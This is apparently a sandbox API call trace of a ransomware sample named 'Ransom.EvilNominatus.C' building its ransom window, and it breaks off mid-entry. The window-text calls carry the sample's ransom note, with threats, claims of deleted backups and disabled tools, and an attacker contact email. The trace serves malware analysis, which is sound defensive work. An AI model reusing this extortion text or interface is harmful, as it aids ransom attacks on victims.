[0311.513] GetCurrentActCtx (in: lphActCtx=0x1af2a8 | out: lphActCtx=0x1af2a8*=0x70b91c) returned 1 [0311.513] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73f60000 [0311.516] AdjustWindowRectEx (in: lpRect=0x1af20c, dwStyle=0x2c40000, bMenu=0, dwExStyle=0x10001 | out: lpRect=0x1af20c) returned 1 [0311.517] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.517] CreateWindowExW (dwExStyle=0x10001, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", lpWindowName="Ransom.EvilNominatus.C", dwStyle=0x2c40000, X=-2147483648, Y=-2147483648, nWidth=879, nHeight=396, hWndParent=0x0, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0xd014a [0311.528] SetWindowLongW (hWnd=0xd014a, nIndex=-4, dwNewLong=2009181920) returned 76350910 [0311.529] GetWindowLongW (hWnd=0xd014a, nIndex=-4) returned 2009181920 [0311.529] SetWindowLongW (hWnd=0xd014a, nIndex=-4, dwNewLong=76351798) returned 2009181920 [0311.588] GetWindowLongW (hWnd=0xd014a, nIndex=-4) returned 76351798 [0311.588] GetWindowLongW (hWnd=0xd014a, nIndex=-16) returned 113508352 [0311.589] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x81, wParam=0x0, lParam=0x1aecc8) returned 0x1 [0311.591] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x83, wParam=0x0, lParam=0x1aecb4) returned 0x0 [0311.593] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x1, wParam=0x0, lParam=0x1aecc8) returned 0x0 [0311.593] GetClientRect (in: hWnd=0xd014a, lpRect=0x1ae9c4 | out: lpRect=0x1ae9c4) returned 1 [0311.593] GetWindowRect (in: hWnd=0xd014a, lpRect=0x1ae9c4 | out: lpRect=0x1ae9c4) returned 1 [0311.595] SetWindowTextW (hWnd=0xd014a, lpString="Ransom.EvilNominatus.C") returned 1 [0311.595] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0xc, wParam=0x0, lParam=0x21077d0) returned 0x1 [0311.600] GetStartupInfoW (in: lpStartupInfo=0x2167044 | out: lpStartupInfo=0x2167044*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0311.602] GetParent (hWnd=0xd014a) returned 0x0 [0311.602] GetStockObject (i=5) returned 0x1900015 [0311.603] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.603] CoTaskMemAlloc (cb=0x5c) returned 0x718f90 [0311.604] RegisterClassW (lpWndClass=0x1af188) returned 0xc1e0 [0311.604] CoTaskMemFree (pv=0x718f90) [0311.604] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.605] CreateWindowExW (dwExStyle=0x80, lpClassName="WindowsForms10.Window.0.app.0.141b42a_r10_ad1", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0x600f8 [0311.605] SetWindowLongW (hWnd=0x600f8, nIndex=-4, dwNewLong=2009181920) returned 76351838 [0311.605] GetWindowLongW (hWnd=0x600f8, nIndex=-4) returned 2009181920 [0311.606] SetWindowLongW (hWnd=0x600f8, nIndex=-4, dwNewLong=76351878) returned 2009181920 [0311.606] GetWindowLongW (hWnd=0x600f8, nIndex=-4) returned 76351878 [0311.606] GetWindowLongW (hWnd=0x600f8, nIndex=-16) returned 79691776 [0311.606] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x600f8, Msg=0x24, wParam=0x0, lParam=0x1aecfc) returned 0x0 [0311.606] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x600f8, Msg=0x81, wParam=0x0, lParam=0x1aecf0) returned 0x1 [0311.607] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x600f8, Msg=0x83, wParam=0x0, lParam=0x1aecdc) returned 0x0 [0311.608] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x600f8, Msg=0x1, wParam=0x0, lParam=0x1aecf0) returned 0x0 [0311.609] SetWindowLongW (hWnd=0xd014a, nIndex=-8, dwNewLong=393464) returned 0 [0311.613] SendMessageW (hWnd=0xd014a, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0311.613] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x80, wParam=0x0, lParam=0x0) returned 0x0 [0311.613] SendMessageW (hWnd=0xd014a, Msg=0x80, wParam=0x1, lParam=0x0) returned 0x0 [0311.613] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x80, wParam=0x1, lParam=0x0) returned 0x0 [0311.613] GetSystemMenu (hWnd=0xd014a, bRevert=0) returned 0x0 [0311.615] GetWindowPlacement (in: hWnd=0xd014a, lpwndpl=0x1af2b8 | out: lpwndpl=0x1af2b8) returned 1 [0311.616] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x1) returned 1 [0311.616] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x1) returned 1 [0311.616] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x1) returned 1 [0311.616] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0311.616] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x0) returned 1 [0311.616] GetClientRect (in: hWnd=0xd014a, lpRect=0x1af2fc | out: lpRect=0x1af2fc) returned 1 [0311.616] GetClientRect (in: hWnd=0xd014a, lpRect=0x1af25c | out: lpRect=0x1af25c) returned 1 [0311.616] GetWindowRect (in: hWnd=0xd014a, lpRect=0x1af25c | out: lpRect=0x1af25c) returned 1 [0311.616] SetWindowLongW (hWnd=0xd014a, nIndex=-8, dwNewLong=393464) returned 393464 [0311.719] GetSystemMetrics (nIndex=11) returned 32 [0311.719] GetSystemMetrics (nIndex=12) returned 32 [0311.719] GetDC (hWnd=0x0) returned 0x6010190 [0311.720] GetDeviceCaps (hdc=0x6010190, index=12) returned 32 [0311.720] GetDeviceCaps (hdc=0x6010190, index=14) returned 1 [0311.720] ReleaseDC (hWnd=0x0, hDC=0x6010190) returned 1 [0311.721] CreateIconFromResourceEx (presbits=0x2169db0, dwResSize=0x10a8, fIcon=1, dwVer=0x30000, cxDesired=0, cyDesired=0, Flags=0x0) returned 0x4202c9 [0311.725] SendMessageW (hWnd=0x600f8, Msg=0x80, wParam=0x1, lParam=0x4202c9) returned 0x0 [0311.725] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x600f8, Msg=0x80, wParam=0x1, lParam=0x4202c9) returned 0x0 [0311.765] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73f60000 [0311.765] GetWindowLongW (hWnd=0xd014a, nIndex=-16) returned 113508352 [0311.765] GetWindowTextLengthW (hWnd=0xd014a) returned 22 [0311.765] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0311.766] GetSystemMetrics (nIndex=42) returned 0 [0311.766] GetWindowTextW (in: hWnd=0xd014a, lpString=0x1af1dc, nMaxCount=23 | out: lpString="Ransom.EvilNominatus.C") returned 22 [0311.766] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0xd, wParam=0x17, lParam=0x1af1dc) returned 0x16 [0311.766] GetWindowTextLengthW (hWnd=0xd014a) returned 22 [0311.766] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x16 [0311.767] GetSystemMetrics (nIndex=42) returned 0 [0311.767] GetWindowTextW (in: hWnd=0xd014a, lpString=0x1af1dc, nMaxCount=23 | out: lpString="Ransom.EvilNominatus.C") returned 22 [0311.767] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0xd, wParam=0x17, lParam=0x1af1dc) returned 0x16 [0311.767] GetWindowLongW (hWnd=0xd014a, nIndex=-16) returned 113508352 [0311.767] GetWindowLongW (hWnd=0xd014a, nIndex=-20) returned 65793 [0311.767] SetWindowLongW (hWnd=0xd014a, nIndex=-16, dwNewLong=46399488) returned 113508352 [0311.767] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x7c, wParam=0xfffffff0, lParam=0x1af254) returned 0x0 [0311.767] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x7d, wParam=0xfffffff0, lParam=0x1af254) returned 0x0 [0311.769] SetWindowLongW (hWnd=0xd014a, nIndex=-20, dwNewLong=65537) returned 65793 [0311.769] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x7c, wParam=0xffffffec, lParam=0x1af254) returned 0x0 [0311.769] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x7d, wParam=0xffffffec, lParam=0x1af254) returned 0x0 [0311.770] SetWindowPos (hWnd=0xd014a, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0311.771] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x46, wParam=0x0, lParam=0x1af274) returned 0x0 [0311.771] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x83, wParam=0x1, lParam=0x1af24c) returned 0x0 [0311.772] GetWindowPlacement (in: hWnd=0xd014a, lpwndpl=0x1aefe4 | out: lpwndpl=0x1aefe4) returned 1 [0311.772] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x47, wParam=0x0, lParam=0x1af274) returned 0x0 [0311.772] GetClientRect (in: hWnd=0xd014a, lpRect=0x1aef94 | out: lpRect=0x1aef94) returned 1 [0311.772] GetWindowRect (in: hWnd=0xd014a, lpRect=0x1aef94 | out: lpRect=0x1aef94) returned 1 [0311.773] RedrawWindow (hWnd=0xd014a, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0311.773] GetSystemMenu (hWnd=0xd014a, bRevert=0) returned 0x0 [0311.774] GetWindowPlacement (in: hWnd=0xd014a, lpwndpl=0x1af2a8 | out: lpwndpl=0x1af2a8) returned 1 [0311.774] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf020, uEnable=0x1) returned 1 [0311.774] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf030, uEnable=0x1) returned 1 [0311.774] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf060, uEnable=0x1) returned 1 [0311.774] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf120, uEnable=0x1) returned 1 [0311.774] EnableMenuItem (hMenu=0x0, uIDEnableItem=0xf000, uEnable=0x0) returned 1 [0311.774] ShowWindow (hWnd=0xd014a, nCmdShow=5) [0311.774] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0311.774] GetCurrentActCtx (in: lphActCtx=0x1aef38 | out: lphActCtx=0x1aef38*=0x70b91c) returned 1 [0311.775] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73f60000 [0311.776] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.776] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.Window.8.app.0.141b42a_r10_ad1", lpWindowName=0x0, dwStyle=0x56000000, X=693, Y=48, nWidth=115, nHeight=120, hWndParent=0xd014a, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0x1e02d4 [0311.776] SetWindowLongW (hWnd=0x1e02d4, nIndex=-4, dwNewLong=2009181920) returned 76350910 [0311.777] GetWindowLongW (hWnd=0x1e02d4, nIndex=-4) returned 2009181920 [0311.777] SetWindowLongW (hWnd=0x1e02d4, nIndex=-4, dwNewLong=76351918) returned 2009181920 [0311.777] GetWindowLongW (hWnd=0x1e02d4, nIndex=-4) returned 76351918 [0311.777] GetWindowLongW (hWnd=0x1e02d4, nIndex=-16) returned 1174405120 [0311.777] GetWindowLongW (hWnd=0x1e02d4, nIndex=-12) returned 0 [0311.777] SetWindowLongW (hWnd=0x1e02d4, nIndex=-12, dwNewLong=1966804) returned 0 [0311.777] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x1e02d4, Msg=0x81, wParam=0x0, lParam=0x1ae958) returned 0x1 [0311.779] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x1e02d4, Msg=0x83, wParam=0x0, lParam=0x1ae944) returned 0x0 [0311.779] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x1e02d4, Msg=0x1, wParam=0x0, lParam=0x1ae958) returned 0x0 [0311.780] GetWindow (hWnd=0x1e02d4, uCmd=0x3) returned 0x0 [0311.780] GetClientRect (in: hWnd=0x1e02d4, lpRect=0x1ae684 | out: lpRect=0x1ae684) returned 1 [0311.780] GetWindowRect (in: hWnd=0x1e02d4, lpRect=0x1ae684 | out: lpRect=0x1ae684) returned 1 [0311.780] GetParent (hWnd=0x1e02d4) returned 0xd014a [0311.780] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0xd014a, lpPoints=0x1ae684, cPoints=0x2 | out: lpPoints=0x1ae684) returned -7077974 [0311.781] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x1e02d4, Msg=0x5, wParam=0x0, lParam=0x780073) returned 0x0 [0311.781] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x1e02d4, Msg=0x3, wParam=0x0, lParam=0x3002b5) returned 0x0 [0311.781] GetClientRect (in: hWnd=0x1e02d4, lpRect=0x1ae6dc | out: lpRect=0x1ae6dc) returned 1 [0311.781] GetWindowRect (in: hWnd=0x1e02d4, lpRect=0x1ae6dc | out: lpRect=0x1ae6dc) returned 1 [0311.781] GetParent (hWnd=0x1e02d4) returned 0xd014a [0311.781] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0xd014a, lpPoints=0x1ae6dc, cPoints=0x2 | out: lpPoints=0x1ae6dc) returned -7077974 [0311.782] SendMessageW (hWnd=0x1e02d4, Msg=0x2210, wParam=0x2d40001, lParam=0x1e02d4) returned 0x0 [0311.782] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x1e02d4, Msg=0x2210, wParam=0x2d40001, lParam=0x1e02d4) returned 0x0 [0311.782] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x1e02d4, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0311.783] GetParent (hWnd=0x1e02d4) returned 0xd014a [0311.783] GetCurrentActCtx (in: lphActCtx=0x1aef38 | out: lphActCtx=0x1aef38*=0x70b91c) returned 1 [0311.783] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73f60000 [0311.784] GetClassInfoW (in: hInstance=0x0, lpClassName="STATIC", lpWndClass=0x216b1bc | out: lpWndClass=0x216b1bc) returned 1 [0311.785] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.786] CoTaskMemAlloc (cb=0x58) returned 0x74bbe8 [0311.786] RegisterClassW (lpWndClass=0x1aedf0) returned 0xc1e1 [0311.786] CoTaskMemFree (pv=0x74bbe8) [0311.786] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.786] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.STATIC.app.0.141b42a_r10_ad1", lpWindowName="your files has been encrypted if you enter the wrong key 3 times we will make you see dark side if you want to restore your files Contact Bkhtyaryrwzbh@gmail.com \r\nwe deleted your backups, we disabled taskmgr, regedit and more if you think you can escape you are very stupid", dwStyle=0x5600000d, X=15, Y=48, nWidth=672, nHeight=197, hWndParent=0xd014a, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0x1302d0 [0311.787] SetWindowLongW (hWnd=0x1302d0, nIndex=-4, dwNewLong=1945758080) returned 76351958 [0311.787] GetWindowLongW (hWnd=0x1302d0, nIndex=-4) returned 1945758080 [0311.787] SetWindowLongW (hWnd=0x1302d0, nIndex=-4, dwNewLong=76351998) returned 1945758080 [0311.788] GetWindowLongW (hWnd=0x1302d0, nIndex=-4) returned 76351998 [0311.788] GetWindowLongW (hWnd=0x1302d0, nIndex=-16) returned 1174405133 [0311.788] GetWindowLongW (hWnd=0x1302d0, nIndex=-12) returned 0 [0311.788] SetWindowLongW (hWnd=0x1302d0, nIndex=-12, dwNewLong=1245904) returned 0 [0311.788] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1302d0, Msg=0x81, wParam=0x0, lParam=0x1ae958) returned 0x1 [0311.789] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1302d0, Msg=0x83, wParam=0x0, lParam=0x1ae944) returned 0x0 [0311.789] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1302d0, Msg=0x1, wParam=0x0, lParam=0x1ae958) returned 0x0 [0311.796] GetWindow (hWnd=0x1302d0, uCmd=0x3) returned 0x1e02d4 [0311.796] GetClientRect (in: hWnd=0x1302d0, lpRect=0x1ae648 | out: lpRect=0x1ae648) returned 1 [0311.796] GetWindowRect (in: hWnd=0x1302d0, lpRect=0x1ae648 | out: lpRect=0x1ae648) returned 1 [0311.796] GetParent (hWnd=0x1302d0) returned 0xd014a [0311.796] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0xd014a, lpPoints=0x1ae648, cPoints=0x2 | out: lpPoints=0x1ae648) returned -7077974 [0311.797] SetWindowTextW (hWnd=0x1302d0, lpString="your files has been encrypted if you enter the wrong key 3 times we will make you see dark side if you want to restore your files Contact Bkhtyaryrwzbh@gmail.com \r\nwe deleted your backups, we disabled taskmgr, regedit and more if you think you can escape you are very stupid") returned 1 [0311.797] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1302d0, Msg=0xc, wParam=0x0, lParam=0x210a818) returned 0x1 [0311.798] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1302d0, Msg=0x5, wParam=0x0, lParam=0xc502a0) returned 0x0 [0311.798] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1302d0, Msg=0x3, wParam=0x0, lParam=0x30000f) returned 0x0 [0311.799] GetClientRect (in: hWnd=0x1302d0, lpRect=0x1ae6a0 | out: lpRect=0x1ae6a0) returned 1 [0311.799] GetWindowRect (in: hWnd=0x1302d0, lpRect=0x1ae6a0 | out: lpRect=0x1ae6a0) returned 1 [0311.799] GetParent (hWnd=0x1302d0) returned 0xd014a [0311.799] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0xd014a, lpPoints=0x1ae6a0, cPoints=0x2 | out: lpPoints=0x1ae6a0) returned -7077974 [0311.799] SendMessageW (hWnd=0x1302d0, Msg=0x2210, wParam=0x2d00001, lParam=0x1302d0) returned 0x0 [0311.799] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1302d0, Msg=0x2210, wParam=0x2d00001, lParam=0x1302d0) returned 0x0 [0311.799] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1302d0, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0311.799] GetParent (hWnd=0x1302d0) returned 0xd014a [0311.799] GetCurrentActCtx (in: lphActCtx=0x1aef38 | out: lphActCtx=0x1aef38*=0x70b91c) returned 1 [0311.800] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73f60000 [0311.800] GetClassInfoW (in: hInstance=0x0, lpClassName="BUTTON", lpWndClass=0x216b4f8 | out: lpWndClass=0x216b4f8) returned 1 [0311.801] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.802] CoTaskMemAlloc (cb=0x58) returned 0x74bbe8 [0311.802] RegisterClassW (lpWndClass=0x1aedf0) returned 0xc1e2 [0311.802] CoTaskMemFree (pv=0x74bbe8) [0311.802] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.802] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.BUTTON.app.0.141b42a_r10_ad1", lpWindowName="GO AWAY!!", dwStyle=0x56012f00, X=373, Y=278, nWidth=141, nHeight=23, hWndParent=0xd014a, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0x110038 [0311.803] SetWindowLongW (hWnd=0x110038, nIndex=-4, dwNewLong=1946148976) returned 76352038 [0311.803] GetWindowLongW (hWnd=0x110038, nIndex=-4) returned 1946148976 [0311.804] SetWindowLongW (hWnd=0x110038, nIndex=-4, dwNewLong=76352078) returned 1946148976 [0311.804] GetWindowLongW (hWnd=0x110038, nIndex=-4) returned 76352078 [0311.804] GetWindowLongW (hWnd=0x110038, nIndex=-16) returned 1174482688 [0311.804] GetWindowLongW (hWnd=0x110038, nIndex=-12) returned 0 [0311.804] SetWindowLongW (hWnd=0x110038, nIndex=-12, dwNewLong=1114168) returned 0 [0311.804] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x81, wParam=0x0, lParam=0x1ae958) returned 0x1 [0311.805] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x83, wParam=0x0, lParam=0x1ae944) returned 0x0 [0311.806] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x1, wParam=0x0, lParam=0x1ae958) returned 0x0 [0311.808] SendMessageW (hWnd=0x110038, Msg=0x2055, wParam=0x110038, lParam=0x3) returned 0x2 [0311.808] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x129, wParam=0x0, lParam=0x0) returned 0x0 [0311.808] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x127, wParam=0x3, lParam=0x0) returned 0x0 [0311.808] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x127, wParam=0x30001, lParam=0x0) returned 0x0 [0311.808] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0xd014a, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0311.809] CallWindowProcW (lpPrevWndFunc=0x77c1aee0, hWnd=0x1e02d4, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0311.809] RedrawWindow (hWnd=0x1e02d4, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0311.809] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1302d0, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0311.809] RedrawWindow (hWnd=0x1302d0, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0311.810] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x128, wParam=0x30001, lParam=0x0) returned 0x0 [0311.810] RedrawWindow (hWnd=0x110038, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0311.810] RedrawWindow (hWnd=0xd014a, lprcUpdate=0x0, hrgnUpdate=0x0, flags=0x85) returned 1 [0311.810] GetWindow (hWnd=0x110038, uCmd=0x3) returned 0x1302d0 [0311.810] GetClientRect (in: hWnd=0x110038, lpRect=0x1ae63c | out: lpRect=0x1ae63c) returned 1 [0311.810] GetWindowRect (in: hWnd=0x110038, lpRect=0x1ae63c | out: lpRect=0x1ae63c) returned 1 [0311.810] GetParent (hWnd=0x110038) returned 0xd014a [0311.810] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0xd014a, lpPoints=0x1ae63c, cPoints=0x2 | out: lpPoints=0x1ae63c) returned -7077974 [0311.810] SendMessageW (hWnd=0x110038, Msg=0x30, wParam=0x250a06c4, lParam=0x0) returned 0x0 [0311.810] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x30, wParam=0x250a06c4, lParam=0x0) returned 0x0 [0311.811] SetWindowTextW (hWnd=0x110038, lpString="GO AWAY!!") returned 1 [0311.811] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0xc, wParam=0x0, lParam=0x21076fc) returned 0x1 [0311.812] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x5, wParam=0x0, lParam=0x17008d) returned 0x0 [0311.812] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x3, wParam=0x0, lParam=0x1160175) returned 0x0 [0311.812] GetClientRect (in: hWnd=0x110038, lpRect=0x1ae694 | out: lpRect=0x1ae694) returned 1 [0311.812] GetWindowRect (in: hWnd=0x110038, lpRect=0x1ae694 | out: lpRect=0x1ae694) returned 1 [0311.812] GetParent (hWnd=0x110038) returned 0xd014a [0311.812] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0xd014a, lpPoints=0x1ae694, cPoints=0x2 | out: lpPoints=0x1ae694) returned -7077974 [0311.812] SendMessageW (hWnd=0x110038, Msg=0x2210, wParam=0x380001, lParam=0x110038) returned 0x0 [0311.812] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x2210, wParam=0x380001, lParam=0x110038) returned 0x0 [0311.813] CallWindowProcW (lpPrevWndFunc=0x73ffe070, hWnd=0x110038, Msg=0x18, wParam=0x1, lParam=0x0) returned 0x0 [0311.813] GetParent (hWnd=0x110038) returned 0xd014a [0311.813] GetCurrentActCtx (in: lphActCtx=0x1aef38 | out: lphActCtx=0x1aef38*=0x70b91c) returned 1 [0311.813] GetModuleHandleW (lpModuleName="comctl32.dll") returned 0x73f60000 [0311.816] GetModuleHandleW (lpModuleName=0x0) returned 0x10000 [0311.816] CreateWindowExW (dwExStyle=0x0, lpClassName="WindowsForms10.STATIC.app.0.141b42a_r10_ad1", lpWindowName="Code:", dwStyle=0x5600000d, X=10, Y=276, nWidth=58, nHeight=24, hWndParent=0xd014a, hMenu=0x0, hInstance=0x10000, lpParam=0x0) returned 0x1502ce [0311.817] SetWindowLongW (hWnd=0x1502ce, nIndex=-4, dwNewLong=1945758080) returned 76351958 [0311.817] GetWindowLongW (hWnd=0x1502ce, nIndex=-4) returned 1945758080 [0311.818] SetWindowLongW (hWnd=0x1502ce, nIndex=-4, dwNewLong=76352118) returned 1945758080 [0311.818] GetWindowLongW (hWnd=0x1502ce, nIndex=-4) returned 76352118 [0311.818] GetWindowLongW (hWnd=0x1502ce, nIndex=-16) returned 1174405133 [0311.818] GetWindowLongW (hWnd=0x1502ce, nIndex=-12) returned 0 [0311.818] SetWindowLongW (hWnd=0x1502ce, nIndex=-12, dwNewLong=1376974) returned 0 [0311.818] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1502ce, Msg=0x81, wParam=0x0, lParam=0x1ae958) returned 0x1 [0311.821] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1502ce, Msg=0x83, wParam=0x0, lParam=0x1ae944) returned 0x0 [0311.821] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1502ce, Msg=0x1, wParam=0x0, lParam=0x1ae958) returned 0x0 [0311.822] GetWindow (hWnd=0x1502ce, uCmd=0x3) returned 0x110038 [0311.822] GetClientRect (in: hWnd=0x1502ce, lpRect=0x1ae648 | out: lpRect=0x1ae648) returned 1 [0311.822] GetWindowRect (in: hWnd=0x1502ce, lpRect=0x1ae648 | out: lpRect=0x1ae648) returned 1 [0311.822] GetParent (hWnd=0x1502ce) returned 0xd014a [0311.822] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0xd014a, lpPoints=0x1ae648, cPoints=0x2 | out: lpPoints=0x1ae648) returned -7077974 [0311.822] SetWindowTextW (hWnd=0x1502ce, lpString="Code:") returned 1 [0311.822] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1502ce, Msg=0xc, wParam=0x0, lParam=0x21076c8) returned 0x1 [0311.824] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1502ce, Msg=0x5, wParam=0x0, lParam=0x18003a) returned 0x0 [0311.825] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1502ce, Msg=0x3, wParam=0x0, lParam=0x114000a) returned 0x0 [0311.825] GetClientRect (in: hWnd=0x1502ce, lpRect=0x1ae6a0 | out: lpRect=0x1ae6a0) returned 1 [0311.825] GetWindowRect (in: hWnd=0x1502ce, lpRect=0x1ae6a0 | out: lpRect=0x1ae6a0) returned 1 [0311.825] GetParent (hWnd=0x1502ce) returned 0xd014a [0311.825] MapWindowPoints (in: hWndFrom=0x0, hWndTo=0xd014a, lpPoints=0x1ae6a0, cPoints=0x2 | out: lpPoints=0x1ae6a0) returned -7077974 [0311.825] SendMessageW (hWnd=0x1502ce, Msg=0x2210, wParam=0x2ce0001, lParam=0x1502ce) returned 0x0 [0311.825] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1502ce, Msg=0x2210, wParam=0x2ce0001, lParam=0x1502ce) returned 0x0 [0311.825] CallWindowProcW (lpPrevWndFunc=0x73f9e980, hWnd=0x1502ce, 